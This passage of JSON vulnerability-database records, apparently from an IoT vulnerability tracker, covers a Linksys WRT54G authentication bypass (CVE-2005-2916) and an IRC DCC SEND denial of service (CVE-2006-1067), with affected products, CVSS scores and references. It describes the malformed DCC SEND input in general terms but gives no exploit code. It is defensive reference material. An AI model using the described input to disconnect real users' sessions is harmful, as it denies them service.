"sources": [
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "VULHUB",
"id": "VHN-14125"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2916",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G \u0027UPGRADE.CGI\u0027 FIRMWARE UPLOAD DESIGN ERROR VULNERABILITY",
"trust": 0.6
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G \u0027RESTORE.CGI\u0027 CONFIGURATION MODIFICATION DESIGN ERROR VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "89357",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14125",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"id": "VAR-200509-0097",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T12:47:16.724000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2916"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=306\u0026type=vulnerabilities"
},
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=307\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=306\u0026amp;type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=307\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14125"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89357"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14125"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89357"
},
{
"date": "2008-09-05T20:52:59.187000",
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G User authentication bypass vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
],
"trust": 0.6
}
}
VAR-200603-0053
Vulnerability from variot - Updated: 2023-12-18 12:47Linksys WRT54G routers version 5 (running VXWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. DCC SEND, or (2) a DCC SEND with an IP address, port, and file size parameter value of 0. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic. This issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users. Linksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200603-0053",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g v5",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "no",
"version": null
},
{
"model": "wrt54g v5",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wgt624",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "0"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.25"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.24"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.22"
},
{
"model": "rt-338",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "me102",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.4"
},
{
"model": "me102",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.3"
},
{
"model": "fvs318v2",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "2.4"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "2.4"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.3"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.2"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.1"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.0"
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "dg834g",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "dg834 adsl firewall router",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "publisher 3f",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20021.40"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "4.70.6"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "4.50.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "wap55ag",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.0.7"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.2"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.3"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.42.7"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.40.3"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.9"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"model": "etherfast befvp41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "etherfast befvp41 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7"
},
{
"model": "etherfast befsr81 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.05.00"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befn2ps4 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4.3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4.2.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.4"
},
{
"model": "befvp41 .3f",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2"
},
{
"model": "befsr81",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41w",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1"
},
{
"model": "befn2ps4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befcmu10",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "wrt54g v5",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g_v5:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ryanmeyer14@netscape.net discovered this issue. Both ryanmeyer14@netscape.net and \"Cade Cairns\" \u003ccairnsc@gmail.com\u003e disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.9
},
"cve": "CVE-2006-1067",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2006-1318",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-17175",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1067",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2006-1318",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200603-107",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-17175",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G routers version 5 (running VXWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. DCC SEND, or (2) a DCC SEND with an IP address, port, and file size parameter value of 0. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic. \nThis issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users. \nLinksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "VULHUB",
"id": "VHN-17175"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-1067",
"trust": 2.8
},
{
"db": "BID",
"id": "16954",
"trust": 2.6
},
{
"db": "BUGTRAQ",
"id": "20060306 RE: LINKSYS ROUTER + IRC DOS",
"trust": 1.2
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2006-1318",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20060304 VARIOUS ROUTER DOS",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060303 LINKSYS ROUTER + IRC DOS",
"trust": 0.6
},
{
"db": "XF",
"id": "25230",
"trust": 0.6
},
{
"db": "IVD",
"id": "CCDF0954-2354-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-17175",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"id": "VAR-200603-0053",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
}
],
"trust": 1.5009907
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
}
]
},
"last_update_date": "2023-12-18T12:47:09.542000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/16954"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/426863/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.hm2k.org/news/1141413208.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426761/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426756/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426934/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25230"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426934/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426761/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426756/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/25230"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/support_main.asp"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
